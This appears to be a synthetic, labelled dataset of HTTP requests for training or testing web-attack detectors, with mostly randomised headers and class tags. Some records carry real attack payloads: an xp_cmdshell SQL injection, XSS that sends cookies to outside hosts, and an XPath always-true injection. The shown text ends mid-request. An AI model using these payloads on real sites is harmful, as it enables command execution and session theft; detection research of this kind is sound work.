If-Match: "O6yteQ5c5WoJZxV38u"
If-None-Match: *
If-Range: Sun, 27 Nov 05 23:58:44 GMT
Max-Forwards: 35
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Basic OW9lVHQ5OkNXOW9wcjZv
Authorization: tely Nkxo8iE=7tmeoIkc
Range: -34442
Referer: http://ewiact.org/edvy/fsiid/eouno.php
TE: trailers,gzip;q=0.4
Trailer: If-Modified-Since
User-Agent: Mozilla/9.7 (compatible; MSIE 6.3; Unix; nttje1Y0dw; q25iieercp; vhhiiohxa)
UA-CPU: StrongARM
UA-Disp: 611,430,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 026x806
Via: 3.9 250.13.205.204, 8.9 www.potseatn.png:67991, oreIb/4.9 84.154.112.73
Transfer-Encoding: gzip
Upgrade: rseahb/4.1
Warning: 767 www.nutng.jpg "imrettlerf" "Thu, 18 Feb 10 04:49:03 GMT"
X-Forwarded-For: 143.52.19.171
X-Serial-Number: 0696294106219
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23354
Start - Id: 41086
class: SqlInjection
GET /gwyXC3EC/sbM@WW10qlOTzVe/hqXjREUnK@U9/Hnho16th95rsrtgx/rl/elrdwiIhvn/iAkFcics/ol5R..jpeg?mR1vus=%27%3BEXEC+master.dbo.xp_cmdshell++%27cmd.exe&rueiairtoa3=tcmdinosp-nySwstg&ietArpxtm=903027&uQ0wKYsfmos1=8144&ay9mnEop9reh=2j&m0=705530&saos=989895&reoUsasioPris=nYea%7Ea%283w7rpositiondw&rnnistaehbua=4Vhv79F HTTP/1.0
Host: www.gararnswer.cz
Connection: keep-alive
Accept: audio/*;q=0.7, video/quicktime;q=0.6
Accept-Charset: utf-7, koi8-r;q=0.8, iso-8859-9;q=0.0, iso-8859-1;q=0.7
Accept-Encoding: deflate;q=0.9, gzip;q=0.3
Accept-Language: eoh-seztst;q=0.8, 82bsy-eeg, so-oanm3es, k-etoAp;q=0.2, qbta-E7hts;q=0.5
Cache-Control: only-if-cached
Client-ip: 183.139.157.162
Cookie: i8i=nnsoror$%document]hB;2tt5=uf8I;@C8Q=mrl.NzzK;9D4positionpEU=dTGtK_;a6h=2080;53betweenunullqIwindow.open=4698369279
Cookie2: $Version="624"
Date: Mon, 20 Mar 06 02:04:48 GMT
ETag: W/"pNa_WXpEGDiRA7WpPUNe"
Expect: todx=mj6wd7;rmdo
From: ttytsmgz@lbtfnlH.de
If-Modified-Since: Sun, 21 Dec 08 07:19:48 UTC
If-Unmodified-Since: Sun, 04 Jan 04 17:28:18 CET
If-Match: "5QIg1LBKZrJufY8Zbegw"
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 7.6
Pragma: stxR2zt=afm
Proxy-Authorization: Digest username="seeg"
Authorization: nedle 4l5o=4osg
Range: 000-,-068966
Referer: /uscfy0/e3ht/othgid.mdb
TE: trailers
Trailer: From
User-Agent: Mozilla/2.8 (Windows; U; WinNT 1.8; ar-tf; rv:9.6.7) Gecko/11930640
UA-CPU: StrongARM
UA-Disp: 2063,773,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 194x0684
Via: HTTP/9.5 www.lsey.js, HTTP/6.7 137.59.172.118:482
Transfer-Encoding: identity
Upgrade: Nb5/4.4, 2oss/0.9, ienmha/5.2, paie/0.1, sMat/4.9
Warning: 451 198.72.245.237:3639 "gyrmlem" 
X-Forwarded-For: 110.167.165.101
X-Serial-Number: 54708069609443708
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41086
Start - Id: 7181
class: Valid
POST /-NAZAOJlJROhttps/2yr7nNJbAYbgsoundD5/1prwla/5u1lt7i2errt/metaIt/PysJUjxmlM9/vmoS5nb7hRQmV5n/n659KcnA_0k.mspx? HTTP/1.0
Content-Length: 57
Content-Language: uc9na,anod,ie1ann
Content-Encoding: identity
Content-Location: /ldesa/oe0aEt/usnw3r3B.php
Content-MD5: aXk3UkNoaW51b3RpZWVuaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 04 Feb 10 02:12:44 UTC
Last-Modified: Fri, 25 May 07 12:50:14 GMT
Host: 29.245.176.133:80
Connection: keep-alive
Accept: video/*;q=0.4, image/*;q=0.4, video/quicktime;q=0.0
Accept-Charset: cp-950;q=0.3, iso-2022-jp
Accept-Encoding: compress, gzip;q=0.8, deflate;q=0.4, identity, identity
Accept-Language: itrdeunm-Odibh9s3
Cache-Control: no-transform
Client-ip: 3.86.121.179
Cookie: ste=dyuh0r+nuGlf;LQ7GZdelete%u=ez_Rzb_LHqut;zo9eTet8sdac8no=94;tE5ps=hB%40xu;p9o0drr=%5CchildaNlogch%5Csr5tsa2access_log+iframe+;ma=8033
Cookie2: $Version="19"
Date: Wed, 11 Feb 09 07:07:23 GMT
ETag: "r1IhS7uz5@tIqm6"
Expect: UEr2hto=zbbH1Ao;ullmqe=Mgfkf
From: rnaa5sa6@a60sretsto.org
If-Modified-Since: Fri, 03 Oct 08 02:10:51 GMT
If-Unmodified-Since: Tue, 22 Sep 09 13:25:24 UTC
If-Match: "Eo.SUQ8@XC2Qtb@"
If-None-Match: "yx930WfaX9yKDZaPk4pI"
If-Range: Sat, 20 Sep 08 11:06:19 UTC
Max-Forwards: 14
MIME-Version: 3.9
Pragma: hpue=reh
Proxy-Authorization: NTLM YWljaTRzd2Vpc3RyTXQ5cjE1YWVPc3VzU2lJaWxtZWlvc2Y=
Authorization: qe3aee eIn0=smDale
Range: 975551-,9376-71358
Referer: /srled.jsp
TE: chunked;q=0.5
Trailer: Pragma
User-Agent: tceapEeI/6.9
UA-CPU: x86
UA-Disp: 337,1594,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 7035x878
Via: 5.2 53.28.167.120:4, FTP/0.9 8.229.129.157:228
Transfer-Encoding: 0e2ru4
Upgrade: aqreph/7.4, yeImai/7.7
Warning: 892 www.oeiareeu.shtml "skEl0E" "Sun, 11 Jul 04 16:54:27 UTC"
X-Forwarded-For: 113.209.161.140
X-Serial-Number: 94479468040904290
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

dno=obMHFylJFwl&omt0iip=05180&7ieaJbih6ch= e''6[9di

End - Id: 7181
Start - Id: 24987
class: Valid
GET /reatzl9iAjw/mcay/tU/5-aPpMVC81_sP/6oe/aaryedaOcTae/twxtot4FRsKsD9.mdb?document-j5ozwlsadminq=n0e%3EdcT&EebhoOniec=b&iaLaRennja8r=n%3Fservicesfttd%25tyno0t%24-aDE HTTP/1.0
Host: 194.131.196.165
Connection: niios6
Accept: text/*
Accept-Charset: iso-8859-15, x-mac-cyrillic;q=0.1, koi8
Accept-Encoding: *
Accept-Language: sahohi6-n0rhr, r1-h2oir, avliac-4dohstI, eQks2Rea-poaTpxoa, oe-uan;q=0.7
Cache-Control: max-stale
Client-ip: 19.99.109.42
Cookie: hheewj79NBo=2;cc7siHs0sc=72499381;1sta=1074
Cookie2: $Version="016"
Date: Sun, 25 Jan 09 20:41:16 GMT
ETag: W/"CvQ_dK.kzcRNGW9HuX"
Expect: aonor
From: ipnejdn@dgaeae.gov
If-Modified-Since: Wed, 19 Nov 08 18:32:57 UTC
If-Unmodified-Since: Sat, 31 Mar 07 03:14:12 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 18 Dec 07 20:26:00 UTC
Max-Forwards: 336
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Digest nc=80E9BD9d
Authorization: NTLM c2lkdGZ0ZW5UN29laGVldWRzaHRlaWxlb2J0dm5TdTBrN3RNaA==
Range: -67,790189-2941
Referer: /otin/nsu7Er/itqrd/daoo7.html
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/8.5 (Machintosh; U; PPC Mac OS X 4.5; yz-nt; rv:3.1.7) Gecko/45643106
UA-CPU: x86
UA-Disp: 7088,5005,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 669x906
Via: HTTP/9.1 189.203.77.236, 3.3 206.66.31.215, tsrs/6.2 142.159.179.12:04
Transfer-Encoding: identity
Upgrade: ttwss/6.4, hfsue/2.6, scs/4.5, hecCt/7.3
Warning: 673 www.f25afno0.jpeg "eEZts4sgvmehth" 
X-Forwarded-For: 254.29.12.40
X-Serial-Number: 4634746
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24987
Start - Id: 15127
class: Valid
GET /n_@zoVey6DCZB6ATOj4/en4/erm2K/e_adveTvEiyc6Ksukl6x/tt/qdgxiirosnstrSalhaah/h6Y92L/SrQ0/tZagRcy4JrqN.aspx? HTTP/1.0
Host: 9.236.227.84
Connection: keep-alive
Accept: image/png;q=0.6
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: eaathnsh-almx, ezmy-amanqnw;q=0.8, 2mnv-vnwratye, rodtneb-rhx3;q=0.1
Cache-Control: max-stale=157
Client-ip: 65.10.135.69
Cookie: Ns2XoYDsLZ=6665502
Cookie2: $Version="7"
Date: Mon, 18 May 09 10:13:41 GMT
ETag: "C.MS2bhi6Vs@uvu__cz-"
Expect: 100-continue
From: tdYa@cfpn.st
If-Modified-Since: Tue, 10 Mar 09 18:53:19 GMT
If-Unmodified-Since: Mon, 29 Mar 10 09:09:16 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 02 Sep 06 16:19:02 GMT
Max-Forwards: 237
MIME-Version: 6.6
Pragma: eioetc='aeyisaq'
Proxy-Authorization: NTLM ZTJhZW5paTc2aTVOM29mYXhyb2V1cWlBWjBzemxsZXN5Mw==
Authorization: Basic cnZvdG86dGU4ZWx0RA==
Range: 8-,8116-1
Referer: /svnH0yaf/rIh9ex.swf
TE: trailers,gzip,gzip;q=0.7
Trailer: Accept-Language
User-Agent: 4owudeen/6.5.5
UA-CPU: 68000
UA-Disp: 203,474,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 572x437
Via: 4.2 219.248.196.224, cTeicn/1.4 www.ettjDh.html:40
Transfer-Encoding: shlah
Upgrade: qafs/3.4, ntrid/3.1, Ffue/7.1, 5uetew/4.0, pt9exy/2.3
Warning: 761 102.136.242.239 "sf0lErlspe" 
X-Forwarded-For: 79.50.237.25
X-Serial-Number: 0851506973
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15127
Start - Id: 46872
class: XSS
POST /eSJ/sgR6lt5X-vv/tmupum/2rezwna/S@a/aCYgkLSRF/iseeas3rvui6uATKre.php? HTTP/1.1
Content-Length: 449
Content-Language: 4tidwth,et
Content-Encoding: gzip
Content-Location: http://www.37tanctl.biz/dihsaha/otahee.aspx
Content-MD5: cnNmc0ViNXQ1MWFLaXJTdQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 24 Oct 07 04:40:11 CET
Last-Modified: Fri, 22 Jun 07 21:28:56 UTC
Host: www.esoqkanga.de:80
Connection: close
Accept: video/mpeg;q=0.1, image/*, audio/*;q=0.2
Accept-Charset: iso-8859-3, iso-8859-15;q=0.7
Accept-Encoding: deflate;q=0.8, gzip;q=0.6
Accept-Language: s0-dxtTptp;q=0.2, tc6ideib-3bht
Cache-Control: min-fresh=11
Client-ip: 74.208.49.31
Cookie: Nsee3aht5s5iDav=aael;IolshomeH=@j@an
Cookie2: $Version="8"
Date: Wed, 29 Dec 04 08:47:46 CET
ETag: W/"wb_0xfJCRnb0.tbpnXGB"
Expect: o8peIAo=Tntr;2acsg=ihsto
From: xorersew@0i1thu.fr
If-Modified-Since: Wed, 28 Oct 09 17:39:25 CET
If-Unmodified-Since: Fri, 11 Mar 05 16:39:07 GMT
If-Match: "DXsJZHPtR_wDooUiIp"
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Basic amFib2lrQWY6bWVxOHNyZA==
Authorization: Digest uri=/ioptabs/frdsoAN/sEhe7/Ittfram8.mpg
Range: 6262-,10870-70169
Referer: http://eo8erql.it/eyRnh/ricrdteo/tm6dni/n7tbQ/ylh7ii.php4
TE: trailers,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/5.4 (compatible; nx9q4lwr; Open BSD i386; rnhta3iawa; Aehncinzf; 8CsksfcJrB)
UA-CPU: x86
UA-Disp: 457,6373,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 2245x173
Via: FTP/3.0 159.8.188.28, 5.7 185.242.215.249
Transfer-Encoding: identity
Upgrade: Btglc/3.9, rreo/8.4
Warning: 910 www.aqeeeiu.htm "tjdShea8TwiOuAu" "Mon, 12 May 08 02:53:43 CET"
X-Forwarded-For: 213.211.107.254
X-Serial-Number: 93268691782079750245
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

plw6t0g=imunad4etalsDmyyau&ok=em&fpabEj=eoem&aa4riL6s4foosDa=29120486&yocbnda67rbms=4&ne=j..s@zQt&olaayIwae=eb?autn+4-rilT&sVeMZ=t4rtvane&It=so&mc=awinputcne&yarsaps=eshb79u&nmeso2iso=<a  href =    " about:<s&#99;ript  >[document.location.replace   ('http://www.seolntas.com/cgi-bin/onatasll.cgi'+document.cookie);]</script  >     "  >&RAIflocationn=bsn&s1ocsBd=7710047&gssutacfoknt=682027

End - Id: 46872
Start - Id: 50061
class: XPathInjection
POST /94@WRX/7@fPJGaM6eval/lte9eaneps87e/g7CBg42NZcn-6Nfa3SiE/eG1Z3netcat/SqgWlA4s.asp? HTTP/1.1
Content-Length: 293
Content-Language: drber,e,el41oy8o
Content-Encoding: identity
Content-Location: /yswmxna/ssnao/eoaces.tiff
Content-MD5: YmFhaWVjd0w3M3Vua2Vpbw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 18 Dec 06 20:57:44 CET
Last-Modified: Sat, 11 Oct 08 15:55:38 CET
Host: 143.160.221.185:09
Connection: d3orca
Accept: */*;q=0.4
Accept-Charset: cp-932;q=0.0, gb2312;q=0.8, big5;q=0.6, iso-8859-3;q=0.3
Accept-Encoding: deflate, identity
Accept-Language: ea-UtdEuit, ozm6afta-f
Cache-Control: only-if-cached
Client-ip: 78.20.93.165
Cookie: xnadeermstorqsn=a;9ee4hsgslwt8rh=prinsy/e/k/child::node()[position()=548]     or  'ieoymaO'    =   ';isralbh6rj=ptt;w1esaosuzjadooz=Treesnmeeeeh;xct5zvS7ootlq=epNmtrcse;emi1uoelTebef0i=tfNnyntxl6p1sp
Cookie2: $Version="188"
Date: Sun, 03 Aug 08 02:21:31 CET
ETag: W/"1@69SC6OhsctPUz"
Expect: 100-continue
From: zilj@eJseheh.st
If-Modified-Since: Thu, 08 Apr 10 18:20:52 GMT
If-Unmodified-Since: Thu, 11 Mar 10 12:11:56 CET
If-Match: "4e4yTPA28OcvJLv5BU"
If-None-Match: "5pjPmGizVNiaTxYD7GX"
If-Range: Tue, 20 Nov 07 22:59:17 GMT
Max-Forwards: 981
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Basic ZWVpZmluYTpybnJydDJlbw==
Authorization: ejXio nhOcel=ne9sseel
Range: 68-,-66180,-89
Referer: http://7ben7rwd.org/5trDeeUm/Jy76tt.mpg
TE: trailers,trailers,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/0.2 (compatible; tcxeHa; Unix; rgtiwuLnt)
UA-CPU: MIPS
UA-Disp: 086,0919,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 3705x532
Via: 9.9 www.thfO.jpeg, FTP/2.7 123.98.110.203
Transfer-Encoding: ellnh
Upgrade: seeim/7.5, eeEad/9.1, noaakN/7.4, uat/4.4, Shme/3.3
Warning: 633 118.107.47.29 "ehmrqron" "Sun, 16 Apr 06 02:34:14 GMT"
X-Forwarded-For: 18.212.91.180
X-Serial-Number: 34243313236496
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Tnas=7403778&eiL3l=0&trRdht8hs0=mrLui4n iibtcemfmrq&qrhsidohqk=ey1wnnEUslthnq&9SnaBdsae7es=sug5U6rbUi9d&replaceadminjlsZlzw4=DaxLemlw6eesir&ewneepa=866137&hs=atism39tr nrmo&ou=3666&me=dmomaa;gtdfineval&3rtoTnOh=ikA8E6Qfm&naQ6i=rnozoboot.iniv&t6=sV.6YjNzBx&MBSr=nczfm&ooNimaje0d=li21cezxbiNce

End - Id: 50061
Start - Id: 16454
class: Valid
GET /5lhtaccesqO9G0/r9F/mQHVyuaSuZnCI0.fn/Jfpzgroup byvTb_/soofer/4dNclwKWaOwd8ertt.swf?6dsLeselo=vietalink%40RyoeformdRebtm+&0r1arir=tnoSedcvngh&ySjhttpCSHWxD=rGd2PgWB_A&Sec=2857321&ipofhttseiIti=6ews2RteEoha&tn82elelubi=94975737 HTTP/1.1
Host: www.cae6e.cz:1137
Connection: noqrtray
Accept: application/*, application/*
Accept-Charset: windows-1255;q=0.5
Accept-Encoding: 
Accept-Language: naikhwsa-upWkrubd;q=0.0, taIf6lrm-epst;q=0.7, n6ni-braet;q=0.5, runft-aEponich;q=0.1
Cache-Control: r=ei
Client-ip: 49.183.229.231
Cookie: oule=ta;2ut=awblm;dlerzErTd=sjte-?IbeEm0
Cookie2: $Version="9"
Date: Tue, 29 Mar 05 18:57:05 CET
ETag: "Hto1yZK4hSdSAcDWi"
Expect: 100-continue
From: wmsnpi0@nrer.gov
If-Modified-Since: Sat, 03 Jun 06 20:49:44 UTC
If-Unmodified-Since: Sun, 12 Apr 09 06:00:26 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 22 Feb 04 17:11:51 CET
Max-Forwards: 539
MIME-Version: 2.7
Pragma: 9=1suK9
Proxy-Authorization: Digest opaque="0cre"
Authorization: Digest response="d4EDaEF673D402ce9bedCdEA85e716a4"
Range: -4,1-
Referer: http://oddon.uk/ia49/abtss0a/ceumct.nsf
TE: deflate;q=0.0
Trailer: Accept
User-Agent: ginodsltnzvcetnr6Zre
UA-CPU: StrongARM
UA-Disp: 097,580,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 714x1442
Via: n6el/4.3 www.o9Ideo.htm, 0.5 www.Kw4ntI.shtml
Transfer-Encoding: hiA1f4; ordceh=hywic8i
Upgrade: hrts/1.5, ocenff/3.9, hafw/0.7, whsmet/4.1
Warning: 398 www.bi0vAerr.tiff:59 "o6sDp9ta" "Sun, 19 Jun 05 14:33:21 UTC"
X-Forwarded-For: 74.91.46.48
X-Serial-Number: 3885571205
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16454
Start - Id: 19878
class: Valid
GET /Re/tS/dSxmzFl/keyuejhnzscHt/o4yZEq/bMicWRDELQ/wFHEylWeD/ip2gGAmfV8/eKB/nst6SE.V/n3OxwooTb4d/uReeahxDvyU7O7.tiff?4fahhrn8=tBx6STCe&sntada8ieNsanke=3steRla&xr7el=MSatea&i7Mscript-qR=t&m7rleaa0wxgtub=Oql%40aeailgt68&kn2E9nx=bLSXh&em7e5=30&19odOtis=nlX+&hu4H0gsenBovmdo=25817204&ienpr80=1 HTTP/1.0
Host: www.lfntsba4mo.net:07366
Connection: keep-alive
Accept: video/quicktime;q=0.7, text/plain;q=0.5
Accept-Charset: iso-2022-jp;q=0.4, ks_c_5601-1987;q=0.5, iso-8859-3;q=0.6
Accept-Encoding: *;q=0.1
Accept-Language: b0bee-yaazc4;q=0.7
Cache-Control: no-transform
Client-ip: 6.254.55.51
Cookie: QnA2C8=alctL;drowi=processing-instructionnt
Cookie2: $Version="9"
Date: Thu, 24 Jul 08 06:40:22 UTC
ETag: "EOrffeq49PfEhy3d0pn"
Expect: 100-continue
From: Ob3d@bses0R.net
If-Modified-Since: Sat, 22 Oct 05 09:37:22 GMT
If-Unmodified-Since: Thu, 24 Sep 09 20:47:47 UTC
If-Match: "63pHBIbv.O-VX7AUjmrX"
If-None-Match: "oaXwEFYXPGnVdtcmNM"
If-Range: *
Max-Forwards: 199
MIME-Version: 6.7
Pragma: ba='zed'
Proxy-Authorization: tIsore haesemqr=7tm5
Authorization: NTLM ZWRnYXA1c3JxZXNpdDFFYWltZXQ2ZWU4N2gyeDluZ2ly
Range: 752-,475-082626,-6481
Referer: http://hat8l.biz/tnOeoee/Neunic/ewhtth/eeryh/osryo1b.bin
TE: gzip;q=0.8
Trailer: Authorization
User-Agent: mplTif9lof3bsoOfaue
UA-CPU: MIPS
UA-Disp: 8808,8661,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 205x6501
Via: 0.1 www.eih2.shtml, 8.3 www.eUEdf.html, FTP/5.1 www.ecynt.js
Transfer-Encoding: compress
Upgrade: ieot/7.9
Warning: 796 165.248.243.125:49 "nsa0mTYgni7ti" "Wed, 31 Mar 10 02:21:30 UTC"
X-Forwarded-For: 176.249.106.242
X-Serial-Number: 11565952861690
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19878
Start - Id: 22106
class: Valid
GET /hsPjQ71B4lge7g/ei/eeocd7e/anHageeesl/-CSXjlZHM5i5Bwadmin/azwOgK-../rb.open5stbi4PH8acceptQ/iLIVfzNxyv_aWSldHNU.jpg?ctfisr4chgra=0141&si=96031175&a5ri=tnIFD%40&kKoildyoeisewr=cfe&toe=o&ewoEWsrwlknah=4%40Ad&nXrtTaccess_logw=ret2qs3ecgv&g1a3Ay=j7nbCNh_4F&sEmobsne2si=%3Apmnptephlscerhvandt&coh4Etepd=h9II&TFte.PNz4W=9qagtelsedTnrteh&yyaodeigyc=91012775&Ruetez=yOrKGkjm&5mw4=nj&sL.sP7ayfX=153786 HTTP/1.0
Host: 126.136.125.4:80
Connection: close
Accept: image/*;q=0.2
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: esot-uaa, vpdk-t;q=0.8
Cache-Control: qmemuga=tp5f
Client-ip: 203.16.208.96
Cookie: vClnodeL= tetFi;._IU=);T3W1V=a0nihd4;miesiaus3rce=rj9h3QRqc
Cookie2: $Version="5"
Date: Sun, 30 Nov 08 24:17:19 UTC
ETag: "LacjLBXku.K2a0kE9RB"
Expect: raried
From: dren@Ttoersyr6.com
If-Modified-Since: Fri, 07 Dec 07 08:51:36 GMT
If-Unmodified-Since: Sat, 18 Dec 04 17:51:24 UTC
If-Match: *
If-None-Match: "5Ac5qmU6PHwIM3zAa"
If-Range: Thu, 01 Oct 09 15:56:32 UTC
Max-Forwards: 20
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: Digest response="2e393a16f1cF1ddcEaF6e4E15f49C06b"
Authorization: Basic aWlvaDowYWRo
Range: -212,11-,-0
Referer: http://d1ss.ch/orrEh/tdBt.msf
TE: trailers,deflate;q=0.0
Trailer: Proxy-Authorization
User-Agent: 5J-Dn5R7x http://www.etCeN89.net
UA-CPU: x86
UA-Disp: 5128,861,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 8724x0388
Via: 6.4 17.74.34.133, 8.9 107.172.180.50, HTTP/4.5 245.221.253.150
Transfer-Encoding: deflate
Upgrade: sdqs/1.2, otap/2.3, suO/8.6, t03/1.8
Warning: 536 162.78.197.155:33480 "iebaetgd" "Tue, 25 Oct 05 10:31:53 GMT"
X-Forwarded-For: 72.161.125.176
X-Serial-Number: 42920569636252963929
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 22106
Start - Id: 30985
class: Valid
GET /Cl4QjlOr0./r6edri/i17Q2o1z27CS/8t/rL11Z7RSCHEG/fufdT/.IgDM/tdIM/eYH_8hGLSPHcntKF-4yB/h4rwi3ie8sbur.nsf?hhsAmmeow=ntetdopetcynnbsehb&kidazH-0fUGxA=4fsnoey22b&hi3x7kVprocessing-instructionx=707938&edieja=h HTTP/1.0
Host: www.LlimKVstex.de
Connection: close
Accept: */*
Accept-Charset: windows-1253;q=0.9, iso-8859-4;q=0.8, ks_c_5601-1987, windows-1255;q=0.2, iso-8859-4
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 80.169.77.77
Cookie: 9v02tlu1asrnc=33633455;sxa1dtiRennLx=0641606;gGIV=erDiinoHha
Cookie2: $Version="2"
Date: Sat, 15 Sep 07 11:25:39 GMT
ETag: W/"rvAXXRC87.FboYLeBLm"
Expect: 7thgrh=svury4er;thSg=rhei1fpc
From: grsl@tetg8e3sNy.uk
If-Modified-Since: Fri, 13 Mar 09 17:26:30 UTC
If-Unmodified-Since: Tue, 29 Sep 09 16:05:58 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 01 Feb 04 12:14:18 GMT
Max-Forwards: 5227
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: Basic cmVtZTphbGVTc20=
Authorization: Basic ZGFydGl0bmU6ZWV1b2VlYw==
Range: 6-
Referer: /fEiuah/rtpdhy/Sa0pit.msf
TE: trailers,gzip,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/5.6 (Machintosh; U; PPC Mac OS X 6.2; hw-0e; rv:3.9.8) Gecko/01681928
UA-CPU: x86
UA-Disp: 692,1497,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 301x912
Via: eynb/0.1 206.60.177.36, eNJrd/2.6 187.196.85.14, 4.0 253.40.2.88
Transfer-Encoding: aoeas; wuhit2n=bagcbew
Upgrade: eeeh/0.3, fDafA/6.5, cd2jet/7.1
Warning: 422 57.104.58.135 "ellasImt7s5o" 
X-Forwarded-For: 228.18.153.246
X-Serial-Number: 65625
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30985
Start - Id: 9641
class: Valid
GET /8oFIHSe23/trkosnd6ltoie/TGO0_xPcQ9Pr/trltkfjq/ldclho71rnldo/efEeottifttl/eBWnUTDpRnDkB/mamoh.nsf? HTTP/1.0
Host: 152.18.74.189
Connection: bnnorn
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: 1sgnead-sss;q=0.0
Cache-Control: Szoe=syt5tmi
Client-ip: 104.66.35.71
Cookie: yfledOIarte4pr7=62507645;IWDDERPqUD-=aa09laemse<sdO;hOviiestblcoic=lteeehILa;vc0EeusnSiYrin=md;tNCaTlinkHG5=8
Cookie2: $Version="50"
Date: Wed, 10 May 06 05:58:49 GMT
ETag: "gRLOTPIf@.eIT7AaDMX"
Expect: n66hah
From: ihbitrga@smetittmer.st
If-Modified-Since: Mon, 14 Jul 08 08:01:00 UTC
If-Unmodified-Since: Wed, 26 Apr 06 01:22:40 GMT
If-Match: "g11gVmn_FtDxF2ia.c"
If-None-Match: "j47-kW1PbWtTDVGDXsra"
If-Range: Mon, 02 Aug 04 22:17:18 CET
Max-Forwards: 1868
MIME-Version: 7.5
Pragma: lvurt71='n0ta'
Proxy-Authorization: jyhe b0tkvyos=lioe3l1
Authorization: ftdtN huln=ar8h
Range: 580-560
Referer: /haUE.html
TE: trailers,trailers,deflate;q=0.3
Trailer: Host
User-Agent: ttmeidet/7.7
UA-CPU: PowerPC
UA-Disp: 0833,784,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 904x062
Via: 8.4 141.209.17.1
Transfer-Encoding: identity
Upgrade: sNh/6.5, ssodh/7.1, jrin/2.9, wHoee/3.7, reoo9/6.9
Warning: 349 180.160.218.155 "yeinlhnok" "Wed, 31 Oct 07 04:57:31 CET"
X-Forwarded-For: 48.192.127.27
X-Serial-Number: 04486
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 9641
Start - Id: 47896
class: XSS
GET /tsnnpci/xPOrs8/apNl5tcFTQ.eXkt/di/Oudsaennw/i0hiKac7oao7zhspt9/4-P22r_aNef5XYI0/ke9KNj/srDCh/tsgectturateenaA6a1.cfm?ytnh=M2rtihsocdr&LS_l48wV_DaZ=12&zrnmipag1mtrto=%3Cdiv+++style++%3D%22+width%3A++expression%28%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.onst.com%2Fcgi-bin%2Filisndne.cgi%27%2Bdocument.cookie%29%3B%5D%29%3B%22++++%3E&feccrtSva=llsvqrul HTTP/1.0
Host: 2.165.70.53:02
Connection: close
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: x9oyelnr-Nno;q=0.9, xe5anEla-cruP;q=0.3
Cache-Control: M=tm
Client-ip: 255.200.38.137
Cookie: n8ehldh7pT6ed=vstdinrtafromlogssr'ol7+li7;tih73ren=93|ia7ilibnertCeni;g-B0743S7qq=659;sw=58;eIsleel=632513;oaqrnRRvee=24933
Cookie2: $Version="7"
Date: Tue, 12 Oct 04 16:34:22 CET
ETag: "mGKHO@G07@ZWa.b4v"
Expect: 100-continue
From: rigu@deao.net
If-Modified-Since: Sat, 02 Feb 08 01:28:54 UTC
If-Unmodified-Since: Fri, 26 Mar 10 24:51:45 GMT
If-Match: "Mk71I5b0ZT-urFZyw"
If-None-Match: "k0IdiQkkiO.c1WsjFRBo"
If-Range: "l5GZ8QJ@b1YUE1VTo9"
Max-Forwards: 3
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: NTLM c2lzZXVkcXNvT252d3NzNWlSbmVsc3NUcnZvZXVCNm90MnhlU250c1M1ZWVPZGV1
Authorization: heh4ty Atut=eajVe0in
Range: -43,-33,199214-
Referer: http://sdTaor7a.com/gnchht/Ifwfpt/oiot.tar.gz
TE: chunked;q=0.6,deflate;q=0.6,chunked;q=0.4
Trailer: Authorization
